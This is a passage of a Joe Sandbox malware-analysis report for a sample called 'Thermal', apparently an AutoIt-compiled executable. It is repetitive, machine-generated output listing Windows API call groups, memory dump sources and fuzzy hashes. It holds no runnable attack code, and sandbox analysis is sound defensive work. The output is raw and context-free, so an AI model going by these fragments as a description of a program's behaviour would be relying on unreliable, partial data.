                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                • Instruction ID: b8a6821a75b888c67683dafd5ea247bbc55e0dc7ef4b619fe0e25fdd9b985fb1
                                                • Opcode Fuzzy Hash: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                • Instruction Fuzzy Hash: FA114F71900109EFCB44FBA4DD4ADAEB7B8FF18311B148065F506A72A2DF359E14DBA1
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                • GetClientRect.USER32(?,?), ref: 007AB93C
                                                • GetCursorPos.USER32(?), ref: 007AB946
                                                • ScreenToClient.USER32(?,?), ref: 007AB951
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                • Instruction ID: c4369f5d0765001c434cdf425d879a5338e63f09b2c927c253f8518ed20ba38e
                                                • Opcode Fuzzy Hash: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                • Instruction Fuzzy Hash: 4F114375A00119EBCF10EF98C8899BE77B9FB45300F944499EA15E7141CB38BA51CFA1
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007C9719
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C972B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C9741
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C975C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                • Instruction ID: 243b742e4ce3c581b3cdbbea371c8b0d9b973090743d7f4a7bb28fa9a1be9226
                                                • Opcode Fuzzy Hash: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                • Instruction Fuzzy Hash: 11115A39901218FFEB11DF95CD84F9DBBB8FB48710F204099EA00B7290D671AE10DB90
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                • GetStockObject.GDI32(00000011), ref: 00772163
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                • Instruction ID: 37a2a20bb87e05dc9f06de63df1656a23cb671be1d0da349fd25e46669544f83
                                                • Opcode Fuzzy Hash: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                • Instruction Fuzzy Hash: 8F118B7210120DBFDF125F909C44EEA7BA9FF583A4F444211FA2852111C73ADC61EFA0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D195E
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D1983
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D198D
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D19C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                • Instruction ID: a91abccd71289c919daaa5b77651d248edbb0f697840db07ecded2916e6075ce
                                                • Opcode Fuzzy Hash: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                • Instruction Fuzzy Hash: 40112731D0466DEBCF00DFA5D9A8BEEBB78FF08751F804156E981B2245CB34A660CB91
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007FE1EA
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 007FE201
                                                • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 007FE216
                                                • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 007FE234
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Similarity
                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                APIs
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007FB956
                                                • ScreenToClient.USER32(?,?), ref: 007FB96E
                                                • ScreenToClient.USER32(?,?), ref: 007FB992
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB9AD
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                APIs
                                                • _memset.LIBCMT ref: 007FBCB6
                                                • _memset.LIBCMT ref: 007FBCC5
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00838F20,00838F64), ref: 007FBCF4
                                                • CloseHandle.KERNEL32 ref: 007FBD06
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D71A1
                                                  • Part of subcall function 007D7C7F: _memset.LIBCMT ref: 007D7CB4
                                                • _memmove.LIBCMT ref: 007D71C4
                                                • _memset.LIBCMT ref: 007D71D1
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D71E1
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                APIs
                                                  • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                  • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC3E8
                                                • LineTo.GDI32(00000000,?,?), ref: 007FC3F5
                                                • EndPath.GDI32(00000000), ref: 007FC405
                                                • StrokePath.GDI32(00000000), ref: 007FC413
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                • GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                • AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0077260D
                                                • SetTextColor.GDI32(?,000000FF), ref: 00772617
                                                • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                • GetStockObject.GDI32(00000005), ref: 00772634
                                                • GetWindowDC.USER32(?,00000000), ref: 007AC1C4
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC1D1
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 007AC1EA
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 007AC203
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC223
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC22E
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 007C9339
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9340
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C8F04), ref: 007C934D
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9354
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B0679
                                                • GetDC.USER32(00000000), ref: 007B0683
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                • ReleaseDC.USER32(?), ref: 007B06C4
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B068D
                                                • GetDC.USER32(00000000), ref: 007B0697
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                • ReleaseDC.USER32(?), ref: 007B06C4
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                APIs
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • __wcsnicmp.LIBCMT ref: 007DB670
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB739
                                                Strings
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: #Vx
                                                • API String ID: 4104443479-2004165239
                                                • Opcode ID: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                • Instruction ID: 2ef45ba564db8081cefc57e84499d31085f12407bf8e82249f5d009305facdd5
                                                • Opcode Fuzzy Hash: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                • Instruction Fuzzy Hash: 49516070900609DFCF24CF68C884AEEBBF5FF85304F248529E85AD7250E735A955CB91
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 0077E01E
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0077E037
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: f11d52cdd0d056db5b4470639190f297c4586b71aa00d0367dc9d5644d3e7982
                                                • Instruction ID: 80924d0e010cf2badacc72f8adc5357ebfe2a95cf63a3c62d79f9b2706be38e4
                                                • Opcode Fuzzy Hash: f11d52cdd0d056db5b4470639190f297c4586b71aa00d0367dc9d5644d3e7982
                                                • Instruction Fuzzy Hash: 5C516772508744DBE720AF10E88ABAFBBF8FF84354F41884CF2D8411A1DB749528CB66
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F8186
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F819B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                • Instruction ID: b691ca95371686e8cb32ae2d52989bde893928a95ee0006011cb81ae5da8ae33
                                                • Opcode Fuzzy Hash: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                • Instruction Fuzzy Hash: 55410874A0120D9FDB54CF68C881BEA7BB5FF08300F50056AEA18EB351DB35A956DF91
                                                APIs
                                                • _memset.LIBCMT ref: 007E2C6A
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E2CA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 4b9d9ace07abc543078155873d08de040272631ed4503fd1177506e2a744df3b
                                                • Instruction ID: 1f5d9ab5656d3a3f989b61f56450048a5ce2ff6a0736cbb20c875be9bed2c5d4
                                                • Opcode Fuzzy Hash: 4b9d9ace07abc543078155873d08de040272631ed4503fd1177506e2a744df3b
                                                • Instruction Fuzzy Hash: E7313971D01219EBCF01EFA1DC89AEEBFB9FF08300F100059F915A6262EB355916DBA0
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 007F713C
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F7178
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: cfa2627bb55b4deefaae5a70b0799f5e96cd0a89cec7fad60da9526d5385a812
                                                • Instruction ID: 1237f94ea8b8a0bbe1b42f20760cbd7008d1bd6f74cd3390f3aaf7e6303634bc
                                                • Opcode Fuzzy Hash: cfa2627bb55b4deefaae5a70b0799f5e96cd0a89cec7fad60da9526d5385a812
                                                • Instruction Fuzzy Hash: 6531B271100208EEDB149F78CC41BFB73A9FF88720F109619FAA987290DB35AC81CB60
                                                APIs
                                                • _memset.LIBCMT ref: 007D30B8
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D30F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 09818c5b8e7ebfea78fa00d4bcb038e9f82ede033c48c581caacb55a1d1ae6ca
                                                • Instruction ID: e95d8b7f8ab77d8a0efd73917d0560e266874217a41f62f688fe18c2c1dd29cd
                                                • Opcode Fuzzy Hash: 09818c5b8e7ebfea78fa00d4bcb038e9f82ede033c48c581caacb55a1d1ae6ca
                                                • Instruction Fuzzy Hash: 1C31063160020EDBEB248F58D885FAEBBB9FF05340F14401AE885A63A0E7799B44CB52
                                                APIs
                                                • __snwprintf.LIBCMT ref: 007E4132
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 3506404897-2584243854
                                                • Opcode ID: 6eaf7503c317fc62cb78c246c21211a360c2a8c658c361efafa09ddf57f0d21d
                                                • Instruction ID: ecd9591da8395a0f556311b64aac41132ffc8946e6630b829f767f8eb9b0e93d
                                                • Opcode Fuzzy Hash: 6eaf7503c317fc62cb78c246c21211a360c2a8c658c361efafa09ddf57f0d21d
                                                • Instruction Fuzzy Hash: 3621B131A4021CEBCF14EFA5D895EAE77B9FF58340F404458F914A7281DB38E985DBA2
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6D86
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F6D91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                • Instruction ID: e6ff3b1315246e0b92db116980a9262c78f2f6f4406ec55d68e1bdb20202f2f1
                                                • Opcode Fuzzy Hash: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                • Instruction Fuzzy Hash: 1911827131020CBFEF219E54DC81EBB3B6BEB883A4F114525FA189B391D679DC519760
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • GetWindowRect.USER32(00000000,?), ref: 007F7296
                                                • GetSysColor.USER32(00000012), ref: 007F72B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                • Instruction ID: 3ddddf66b6f3d9a65133422dc22c0263ea005f61a967cc3059e391f4d55e1e87
                                                • Opcode Fuzzy Hash: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                • Instruction Fuzzy Hash: E621177261420AAFDB04DFA8CC45AFA7BB8FB08314F004519FE55D3251D639E851DB60
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 007F6FC7
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F6FD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                • Instruction ID: 76aeb12ed153b4989cc1f442151d0eecfbbffeae2692f1c5dbc632bb1f259eba
                                                • Opcode Fuzzy Hash: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                • Instruction Fuzzy Hash: 55113A7150020CABEB509E64EC84EBB3BAAEB15368F504714FA75972E0C77ADC51AB60
                                                APIs
                                                • _memset.LIBCMT ref: 007D31C9
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D31E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
